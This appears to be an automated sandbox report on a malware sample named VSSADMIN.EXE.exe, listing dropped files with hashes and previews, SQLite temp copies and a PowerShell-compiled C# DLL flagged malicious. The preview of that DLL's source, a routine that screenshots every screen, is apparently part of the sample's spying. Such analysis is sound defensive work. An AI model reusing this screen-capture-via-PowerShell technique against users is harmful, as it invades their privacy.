                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................,...............,.....,.....,.y...,.....Rich..........PE..d......d.........." ...".`.......@.......P................................................`.............................................X....................P..0.......................................................@...........................................UPX0.....@..............................UPX1.....`...P...^..................@....rsrc................b..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0caqy5zo.se3.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:1

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1fijdufo.ts0.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:1

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aw03lczq.mq1.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:1

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_barw3bij.5tv.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:1

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bpm5s1yx.104.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:1

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ibknxhy4.iyb.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:1

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iu3ijhec.u1h.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:1

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jpuk35as.z3y.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:1

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kmvecsx1.qzd.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:1

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nq50ozn3.5ah.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:1

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_peh42opi.2jt.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:1

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sb43tigj.xpz.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:1

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_syayt5iu.zwy.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:1

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u0j1p4ad.uu4.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:1

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yuhqumdg.5bg.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:1

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_znbcwlgr.fm2.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:1

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\cLm8FipMmJ.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 11, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):28672
                                                                                                                                                                    Entropy (8bit):1.525382148408982
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:oe8To9Eapxv//u29ikqnXxa3Itq273BzkTDnw3:o3IpV//u2QZo27V
                                                                                                                                                                    MD5:BAD7730F6FDE1661858D7C76366933B1
                                                                                                                                                                    SHA1:7679157DBA24CF0FD2DC03AE73611B04227EF8A5
                                                                                                                                                                    SHA-256:9F5A853FAB80EF233F4382B3B07412D1077AF8985222BBF701C8A824BEE22AFB
                                                                                                                                                                    SHA-512:B1B1E0C534D96138F8752936776C3A7FD08100C99B04C55A0D7F22D0688868829C784C34F319A9FBC8F18F54DEFC7E7B07C9E40734C7C48882FE0BDEC3C66E5E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\hRT4juQe8U.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):49152
                                                                                                                                                                    Entropy (8bit):0.7876734657715041
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                                                                                                    MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                                                                                                    SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                                                                                                    SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                                                                                                    SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ozweafg0\CSCCDFC3EC49286452EA176429826C32718.TMP

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                    File Type:MSVC .res
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):652
                                                                                                                                                                    Entropy (8bit):3.085971199934783
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryl8qak7YnqqG8bPN5Dlq5J:+RI+ycuZhNP8qakSG8bPNnqX
                                                                                                                                                                    MD5:B967146675FC0D6BFA494B56B7C6BEBC
                                                                                                                                                                    SHA1:A12EDF3BA2AF4092B53BDF27790CD415724B9677
                                                                                                                                                                    SHA-256:8A150D58F4B729D57CC6FA34DF37C27287B109016A2D5DA3B57800FEC764CE87
                                                                                                                                                                    SHA-512:D5E1BA12FD545165937311FDB8B11D4718C162DA206C4FC010707535412500568AFB2A1AFC5252492FB30604A0062A37610CBCC6DBA65D6BC827F0FA508DA80C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.z.w.e.a.f.g.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...o.z.w.e.a.f.g.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.0.cs

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1004
                                                                                                                                                                    Entropy (8bit):4.154581034278981
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                    MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                    SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                    SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                    SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.cmdline

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):607
                                                                                                                                                                    Entropy (8bit):5.313883735902588
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikOfwqNqoUWZEifwqNq2:V3ka6KOkqeFkOfww1EifwO
                                                                                                                                                                    MD5:C8F9F1E9BC764C8476EB205E6D6EC772
                                                                                                                                                                    SHA1:CDB9E34C66622CAEB33EA6F1C2550831C04E83A6
                                                                                                                                                                    SHA-256:74BAB8BD453DC773EE2804A4F5361B1749542DFFB857C4B3D621C2131BEBBDC9
                                                                                                                                                                    SHA-512:BF083FF9D5C73B93F93DD4E8E15B0FD7B759033B16661BBAC6107883841B18159449B514F506F230F41A35DE45BF2E8D41516BB0129B46576D15F0562E708613
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.0.cs"

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4096
                                                                                                                                                                    Entropy (8bit):3.152074880959527
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:6g7oEAtf0KhzBU/3Vf6mtJON0eDpW1ulla35q:4Nz03smWO+XK
                                                                                                                                                                    MD5:6C615C9F69DE3470B75D17B7EEAE8D9A
                                                                                                                                                                    SHA1:84B2CA6CD6605FBDD46E44158BAC97F5273C2EF9
                                                                                                                                                                    SHA-256:49E33F45A698837C016A60DE76044C9EF4A54FE950844A56308D9CA9743460BD
                                                                                                                                                                    SHA-512:3F9D803F7972BBF1E1A607B57595AB99572A85433B9A0939BE492769EDED5CD784F2BE5DA9423C84F45D3C5A2E3F10F6941F2FEFAD5DAE097E0D0CA08E663667
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.out

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):1149
                                                                                                                                                                    Entropy (8bit):5.492138476285278
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:KJfNgxId3ka6KOkqeFkOfww1EifwvKaMD5DqBVKVrdFAMBJTH:uN4kka6NkqeFkyww1EuwvKdDcVKdBJj
                                                                                                                                                                    MD5:354D53318AF746A761D58800790D3D7D
                                                                                                                                                                    SHA1:FD53D7B16B76B26B4C3FD20385B88738D01D17B8
                                                                                                                                                                    SHA-256:A7962FDA9ECB29AC21FAEFE1F192E193965501C5A29AADB79BC3C709C21E0347
